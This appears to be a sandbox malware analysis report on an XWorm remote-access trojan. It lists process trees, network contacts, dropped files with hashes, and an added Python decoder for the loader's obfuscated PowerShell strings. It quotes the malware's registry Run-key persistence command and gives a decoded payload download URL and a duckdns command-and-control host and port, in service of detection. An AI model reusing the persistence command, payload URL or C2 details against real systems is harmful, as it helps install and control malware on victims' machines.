"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Nonharmoniousness171% -w 1 $Acetonen=(Get-ItemProperty -Path 'HKCU:\ledelsessystemets\').Hovedstillingers;%Nonharmoniousness171% ($Acetonen)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Nonharmoniousness171% -w 1 $Acetonen=(Get-ItemProperty -Path 'HKCU:\ledelsessystemets\').Hovedstillingers;%Nonharmoniousness171% ($Acetonen)"
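
The string decoder used by the powershell.exe command lines above, re-implemented in Python as an added example written for this page (the decoder is ours; the padded literals inside PADDED are copied verbatim from the report's command line, and the SNIPPET is a constructed two-statement excerpt in the loader's own syntax):

```python
"""Decoder for the string obfuscation used by the PowerShell stage in this report.

Added example for this page; the decoder is ours, the padded literals in
PADDED are copied verbatim from the report's powershell.exe command line.

The loader defines `alcoholist`, which walks a junk-padded literal and keeps
one character out of every six (offsets 5, 11, 17, ...), stopping before the
last character, and `Compulsed`, which is `& iex`. Every `alcoholist '...'`
call therefore hides either a configuration string or a PowerShell statement
that is executed immediately.
"""
import re


def alcoholist(padded: str, start: int = 5, step: int = 6) -> str:
    """Port of: For($i=5; $i -lt $s.Length-1; $i+=6) { $out += $s.Substring($i,1) }."""
    end = len(padded) - 1  # $Midwestward = $s.Length - $Polytyped, with $Polytyped = 1
    return "".join(padded[i] for i in range(start, end, step))


# Literals copied from the command line, keyed by the variable they populate
# (retry_delay is a statement passed straight to Compulsed, not a variable).
PADDED = {
    "Besindet": "Un eritranseGluerxa ema ",
    "Tjekkoslovaks": "Lo,gsUOutblsNedb,eJulehrSvi e-TelefA M xigForsieRebr.nIsos.tCount ",
    "Physicobiological": "Desil>Su.id ",
    "Ingester": "ReliehFrys,tParletTilskp IntrsTelef: Back/Prep./Gen,edFlskee Hjt,.Plagih .ndke U.ioaFiflel.ataetFejlthStemma Ube n TierdAvls wDam.se Rotulafmagl SusunForsaeakutbsMakefs Kj.rbI terlKrmmeoKneblg Elgk. LignzRemiga Hje,.Ben,oc SstroForham Jepp/tuttycGynaev Spdb/P uffTFredej HarreLlebrn SmaaeSinnesKo.ib.P.intrOptimagest,rRdder ",
    "retry_delay": "FredeS BoxftUd rma Udsor Skr,tPres,-Pol.gSAfgaslPrel eMeroce MisapAgerh Carin4Comic ",
}

DECODED = {name: alcoholist(lit) for name, lit in PADDED.items()}

# Every decoder call in the script has the shape: alcoholist '<padded literal>'
_CALL_RE = re.compile(r"alcoholist\s+'([^']*)'")


def decode_script_literals(script: str) -> list[str]:
    """Decode every alcoholist '...' literal found in a script, in source order."""
    return [alcoholist(lit) for lit in _CALL_RE.findall(script)]


# Constructed excerpt in the loader's own syntax, built from two of the literals above.
SNIPPET = (
    "$Besindet=alcoholist 'Un eritranseGluerxa ema ';"
    "Compulsed (alcoholist 'FredeS BoxftUd rma Udsor Skr,tPres,-Pol.gSAfgaslPrel eMeroce MisapAgerh Carin4Comic ');"
)

if __name__ == "__main__":
    for name, value in DECODED.items():
        print(f"{name:18s} -> {value!r}")
    print(decode_script_literals(SNIPPET))
```

Running it recovers the interpreter (Besindet = iex), the header name User-Agent, the URL separator ">" and the download URL https://de.healthandwellnessblog.za.com/cv/Tjenes.rar, and shows that the statement inside the while loop is Start-Sleep 4, i.e. the loader polls the download URL list until a fetch succeeds. One caveat when decoding from this page rather than from the dropped xmwugm.vbs or a process-creation event: the report's rendering has collapsed some runs of spaces inside the literals, so the longer ones (for example the User-Agent value in Deltidsarbejderes, which decodes cleanly only as far as "Mozilla/5.0 (Windows NT 10.0;", and the cmd echo in Cobolkommandoen) drift by one character after the collapsed point and come out garbled from there on.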

Network

Note: the *.in-addr.arpa rows are reverse (PTR) lookups the sandbox issued for addresses the VM touched; they carry no indicator value on their own. The actionable rows are the HTTPS connections to de.healthandwellnessblog.za.com (154.26.154.116, the host in the download URL that the PowerShell script's string decoder yields) and joccupationalscience.org (185.184.154.17, contacted next), and the TCP session to mayxw9402.duckdns.org:9402 (12.221.146.138), the only non-HTTPS outbound connection and the likely XWorm command-and-control channel. duckdns.org names are dynamic DNS and can be re-pointed at any time, so block the hostname and alert on the destination port as well as the IP.

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 mayxw9402.duckdns.org udp
US 12.221.146.138:9402 mayxw9402.duckdns.org tcp
US 8.8.8.8:53 138.146.221.12.in-addr.arpa udp
US 8.8.8.8:53 de.healthandwellnessblog.za.com udp
AU 154.26.154.116:443 de.healthandwellnessblog.za.com tcp
US 8.8.8.8:53 116.154.26.154.in-addr.arpa udp
US 8.8.8.8:53 79.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 joccupationalscience.org udp
AU 185.184.154.17:443 joccupationalscience.org tcp
US 8.8.8.8:53 17.154.184.185.in-addr.arpa udp
US 8.8.8.8:53 80.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 11.97.55.23.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 28.73.42.20.in-addr.arpa udp

Files

memory/5064-0-0x00007FF9F8B43000-0x00007FF9F8B45000-memory.dmp

memory/5064-1-0x00000000005F0000-0x0000000000600000-memory.dmp

memory/5064-6-0x00007FF9F8B40000-0x00007FF9F9601000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmwugm.vbs

MD5 c6ea093c28624fba97ebea592736640c
SHA1 b989c4f2377c8cb0e362b0ad96238194ae0e534a
SHA256 4c50875efb6badccfe526c866dab42b2f6a40e8a490e1cb6119020ed4849dbce
SHA512 3194847043a76863b583bc386a3e90443132b18de9563ac98d940f22d9fd61c39109008ccd1f92fc2a3b05e3815998a62abfc820ec0e8b2c14a41d009bd51f58

memory/5064-11-0x00007FF9F8B40000-0x00007FF9F9601000-memory.dmp

memory/4428-13-0x000002C4AD530000-0x000002C4AD552000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g3py32c1.hla.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1756-24-0x0000000003040000-0x0000000003076000-memory.dmp

memory/1756-25-0x0000000005BE0000-0x0000000006208000-memory.dmp

memory/1756-26-0x0000000005AD0000-0x0000000005AF2000-memory.dmp

memory/1756-27-0x00000000062C0000-0x0000000006326000-memory.dmp

memory/1756-28-0x0000000006330000-0x0000000006396000-memory.dmp

memory/1756-38-0x00000000064E0000-0x0000000006834000-memory.dmp

memory/1756-39-0x0000000006970000-0x000000000698E000-memory.dmp

memory/1756-40-0x00000000069A0000-0x00000000069EC000-memory.dmp

memory/1756-41-0x00000000081B0000-0x000000000882A000-memory.dmp

memory/1756-42-0x0000000006F10000-0x0000000006F2A000-memory.dmp

memory/1756-43-0x0000000007C70000-0x0000000007D06000-memory.dmp

memory/1756-44-0x0000000007BD0000-0x0000000007BF2000-memory.dmp

memory/1756-45-0x0000000008DE0000-0x0000000009384000-memory.dmp

C:\Users\Admin\AppData\Roaming\behint.shr

MD5 bf49435216b596110f42c8cf49e9ff88
SHA1 1311c671bf48e4021d3b152b6d843eb2fb712cc6
SHA256 d2f505d87f1458187860f7d4b0605963ea921635b3cb9ce4825b92e5c86c3d14
SHA512 9b66cac0a87809a1e63c59c9f1c430c1b5af30ddd27f0b6c2d93de8381bf764c96093384b8f67ce970ef46a589bfebce4b9ff7444b512bcd6132de82eb011e7f

memory/1756-47-0x0000000009390000-0x000000000A8BD000-memory.dmp

memory/3580-55-0x0000000001000000-0x0000000002254000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\3582-490\wab.exe

MD5 72ad21d191b58842334d32a381ea7fa8
SHA1 f7375f09855a7bce9f7a152c75e84aac69caf828
SHA256 87abfab7bf5e213fc9e63c7fa39edfa6452eb5f7fdd668cd370d9cf4ea3ef729
SHA512 78662231c7ce0d03374b69dfd32614786dc5bf0c8ad2baadf2143f42bb03bd378632cc457dc414aa7e3d284674cc9151c39f90d71d9a5dd15dba689b2283386d

C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROTE~1.EXE

MD5 0a1704e48ff603332eaac935608d3cf1
SHA1 e138d3d481c054a89b85312bfddd2f8a0baf8c1b
SHA256 d9e02af7b220e25f385c71e0a3be4b83203e0673cc1e56fcf02d3e1f0f3774b6
SHA512 7cec7a7c5542e66e347381e9ab5572b2231ab11dac61d9a76bcb7cbd4bd1e86f8169e7840c2e69f93e686cc1834e52cd6b47817b760ea618139a3de64076314f

memory/3580-130-0x0000000001000000-0x0000000002254000-memory.dmp

memory/3580-156-0x0000000001000000-0x0000000002254000-memory.dmp

memory/3580-157-0x0000000001000000-0x0000000002254000-memory.dmp

memory/3580-159-0x0000000001000000-0x0000000002254000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-21 03:48

Reported

2024-05-21 03:51

Platform

win7-20240508-en

Max time kernel

149s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

Xworm

trojan rat xworm

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.lnk C:\Users\Admin\AppData\Local\Temp\1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.lnk C:\Users\Admin\AppData\Local\Temp\1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe

"C:\Users\Admin\AppData\Local\Temp\1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\qyohla.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe


C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\behint.shr && echo t"

Network

Country Destination Domain Proto
US 8.8.8.8:53 mayxw9402.duckdns.org udp
US 12.221.146.138:9402 mayxw9402.duckdns.org tcp
US 8.8.8.8:53 de.healthandwellnessblog.za.com udp
AU 154.26.154.116:443 de.healthandwellnessblog.za.com tcp

Files

memory/1716-0-0x000007FEF5B73000-0x000007FEF5B74000-memory.dmp

memory/1716-1-0x0000000000B10000-0x0000000000B20000-memory.dmp

memory/1716-6-0x000007FEF5B70000-0x000007FEF655C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\qyohla.vbs

MD5 c6ea093c28624fba97ebea592736640c
SHA1 b989c4f2377c8cb0e362b0ad96238194ae0e534a
SHA256 4c50875efb6badccfe526c866dab42b2f6a40e8a490e1cb6119020ed4849dbce
SHA512 3194847043a76863b583bc386a3e90443132b18de9563ac98d940f22d9fd61c39109008ccd1f92fc2a3b05e3815998a62abfc820ec0e8b2c14a41d009bd51f58

memory/1716-11-0x000007FEF5B70000-0x000007FEF655C000-memory.dmp

memory/2848-16-0x000000001B770000-0x000000001BA52000-memory.dmp

memory/2848-17-0x0000000001EF0000-0x0000000001EF8000-memory.dmp